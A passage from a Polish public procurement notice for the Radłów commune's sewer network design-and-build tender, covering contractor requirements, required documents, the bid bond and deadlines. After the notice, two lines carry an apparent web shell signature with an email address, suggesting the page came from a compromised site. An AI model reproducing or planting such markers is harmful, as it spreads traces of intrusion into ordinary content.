udostępnienia zasobów, odpowiada solidarnie <br/>z wykonawcą, który polega na jego sytuacji finansowej lub ekonomicznej, za szkodę poniesioną przez zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów podmiot ten nie ponosi winy.<br/>2)	zdolności technicznej lub zawodowej:<br/>a) Zamawiający uzna, że wykonawca spełnia warunek w/w zakresie jeżeli wykaże, że posiada doświadczenie w realizacji zamówień odpowiadających przedmiotowi zamówienia, tj.:<br/>•	w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie co najmniej 2 zadanie polegające na opracowaniu projektu budowlanego oraz wykonawczego wraz z uzyskaniem wszelkich zgód administracyjnych na budowę sieci kanalizacji sanitarnej – projektu, który uwzględniał kanalizację grawitacyjną, ciśnieniową oraz sieciowe pompownie ścieków - Załącznik nr 7A do SWZ.<br/>•	w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie, zgodnie z przepisami prawa budowlanego i prawidłowo ukończył co najmniej 2 roboty budowlane, związane z budową lub przebudową kanalizacji sanitarnej – o wartości nie mniejszej niż 2.000.000,00 zł brutto każda robota - Załącznik nr 7B do SWZ.<br/><br/>Roboty te muszą być poparte dowodami potwierdzającymi, że zostały wykonane należycie, zgodnie z przepisami prawa budowlanego i prawidłowo ukończone. <br/><br/>b) Wykonawca wykaże, że dysponuje lub będzie dysponował na potrzeby realizacji zamówienia osobami posiadającymi uprawnienia budowlane w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane lub odpowiadającymi im równoważnymi uprawnieniami wydanymi na podstawie wcześniejszych przepisów zakresie wystarczającym do kierowania robotami. Wykonawca będzie dysponował zespołem osób, w skład którego wejdą w szczególności:<br/>•	przynajmniej jedna sobą posiadającą uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń kanalizacyjnych (branża sanitarna);<br/>•	przynajmniej jedna osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń kanalizacyjnych (branża sanitarna – kierownik budowy);<br/><br/>Formularz wykaz osób stanowi Załącznik nr 11 do SWZ<br/><br/>Zamawiający dopuszcza łączenie wyżej wskazanych funkcji pod warunkiem spełnienia przez osobę łączącą te funkcje wszystkich warunków wymaganych dla poszczególnych funkcji.<br/>Samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust 1 ustawy Prawo budowlane, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych, tj. m. in. w ustawie o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej z dnia 22 grudnia 2015r. (Dz. U. z 2023r. poz. 334 ze zm.) oraz w rozumieniu art. 20a ust. 1 ustawy z dnia 15 grudnia 2000r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2023r., poz. 551).<br/>Odnośnie do wykonawców wspólnie ubiegających się o udzielenie zamówienia mogą oni polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane.<br/>W takim przypadku Wykonawcy składają oświadczenie, określone w art. 117 ust. 4 ustawy Pzp, którego wzór określony został w Załączniku nr 10 do SWZ.<br/><br/>W przypadku posługiwania się przez wykonawcę cudzym potencjałem, wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane, do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych: b)	W zakresie potwierdzenia braku podstaw do wykluczenia:<br/>	oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu złożonym na podstawie art. 125 ust. 1 Pzp, w zakresie podstaw wykluczenia <br/>z postępowania wskazanych przez Zamawiającego, o których mowa w: <br/>a) art. 108 ust. 1 pkt. ustawy Pzp, <br/>b) w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 roku o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego którego wzór stanowi Załącznik nr 8 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/><br/>a)	W zakresie potwierdzenia spełniania warunków udziału w postępowaniu:<br/>	wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy (Załącznik nr 7A do SWZ).<br/>	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz, których roboty budowlane zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz, którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty, zgodnie z wymogiem określonym w Rozdziale II ust. 7 pkt. 1) SWZ. – Załącznik nr 7B do SWZ <br/>	Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług (wykonanie dokumentacji projektowej) i kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia – niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacja o podstawie do dysponowania tymi osobami (Załącznik nr 11 do SWZ).<br/>	dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez zamawiającego, w Rozdziale II ust. 7 pkt. 2) SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1)	Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w kwocie: 50.000,00 zł (słownie: pięćdziesiąt tysięcy zł 00/100).<br/>2)	Wadium musi obejmować pełen okres związania ofertą, tj. do dnia 15.03.2024 r.. <br/>3)	Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp.<br/>4)	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy w banku w Banku Spółdzielczym Rzemiosła Oddział Radłów Nr 10858900060240000000260004 z dopiskiem “wpłata wadium – sprawa nr PPI.271.5.24”. <br/>5)	Wadium musi wpłynąć na wskazany rachunek bankowy zamawiającego najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy zamawiającego).<br/>6)	Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać następujące elementy:<br/>-	nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego), gwaranta/poręczyciela oraz wskazanie ich siedzib. Beneficjentem wskazanym w gwarancji lub poręczeniu musi być Gmina Radłów z siedzibą ul. Kolejowa 7, 33-130 Radłów<br/>-	określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>-	kwotę gwarancji/poręczenia,<br/>-	termin ważności gwarancji/poręczenia,<br/>-	zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp.<br/>7)	W przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>8)	Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5 ustawy Pzp.<br/>9)	Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim<br/>przypadku:•Wykonawcy występujący wspólnie są zobowiązani do ustanowienia<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w<br/>postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.• Wszelka<br/>korespondencja będzie prowadzona przez zamawiającego wyłącznie z<br/>pełnomocnikiem.Oświadczenie potwierdzające brak podstaw wykluczenia wykonawcy oraz<br/>spełnianie warunków udziału w postępowaniu składa każdy z wykonawców wspólnie<br/>ubiegających się o zamówienie. Odnośnie do wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia mogą oni polegać na zdolnościach tych z wykonawców, którzy wykonają<br/>roboty budowlane, do realizacji których te zdolności są wymagane.W takim przypadku<br/>Wykonawcy składają oświadczenie, określone wart. 117 ust. 4 ustawy Pzp, którego wzór<br/>określony został w Załączniku nr 10 do SWZ. Pozostałe wymagania określają dokumenty<br/>zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Dopuszczalne są następujące przypadki zmiany i warunki zmiany treści umowy:a)Zmiana<br/>materiałów budowlanych, sprzętu, urządzeń, sposobu wykonania gdy wykorzystanie materiałów<br/>budowlanych, sprzętu i urządzeń wskazanych w dokumentacji projektowej lub ofercie, sposobu<br/>wykonania stanie się niemożliwe lub podyktowane będzie usprawnieniem procesu<br/>budowy,postępem technologicznym, zwiększeniem bezpieczeństwa na budowie,b)Zmiana<br/>terminu realizacji przedmiotu zamówienia i wynagrodzenia Wykonawcy w przypadku:<br/> działania<br/>siły wyższej, uniemożliwiającej wykonanie robót w określonym pierwotnie terminie,<br/> zaistnienia<br/>niesprzyjających warunków atmosferycznych, uniemożliwiających wykonanie robót lub<br/>spełnienie wymogów technologicznych udokumentowanych w dzienniku budowy,<br/> konieczności<br/>uzyskania decyzji i uzgodnień, mogąca spowodować wstrzymanie robót,<br/>konieczności wykonania<br/>dodatkowych badań i ekspertyz,<br/> przedłużającej się procedury administracyjnej z przyczyn niezależnych od Wykonawcy. zmiany<br/>sposobu przeprowadzenia robót, ograniczenia zakresu robót lub wprowadzeniem robót<br/>zamiennych.  konieczności wprowadzenia zmian w dokumentacji projektowej, a wynikających z<br/>konieczności dostosowania zakresu zadania do powszechnie obowiązujących przepisów prawa<br/>braku możliwości prowadzenia robót na skutek warunków klimatycznych: (gwałtowne opady<br/>deszczu, gradobicie, śnieżyce, powodzie i inne anomalia klimatyczne) uniemożliwiające<br/>prowadzenie robót budowlanych, przeprowadzanie prób(sprawdzeń), dokonanie odbiorów,<br/>przez okres powyżej 4 dni,<br/> nieterminowego, z przyczyn niezależnych od Wykonawcy, przekazaniem przez Zamawiającego<br/>terenu budowy Wykonawcy, wstrzymania prac budowlanych przez właściwy organ z przyczyn<br/>niezależnych od Wykonawcy,<br/>innych okolicznościami niepowstałych z winy Wykonawcy (m.in. koniecznością wykonania robót<br/>dodatkowych lub robót zamiennych; koniecznością wykonania robót przez innego Wykonawcę w<br/>miejscu wykonywania prac budowlanych), c) Zmiana wynagrodzenia za realizację zadnia<br/>objętego zamówieniem w przypadku zmiany stawki podatku VAT oraz na skutek zmiany cen<br/>materiałów budowlanych (klauzula waloryzacyjna). Szczegółowy opis sposobu dokonywania<br/>zmian zawarty został w SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-02-15 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-02-15 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-03-15</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com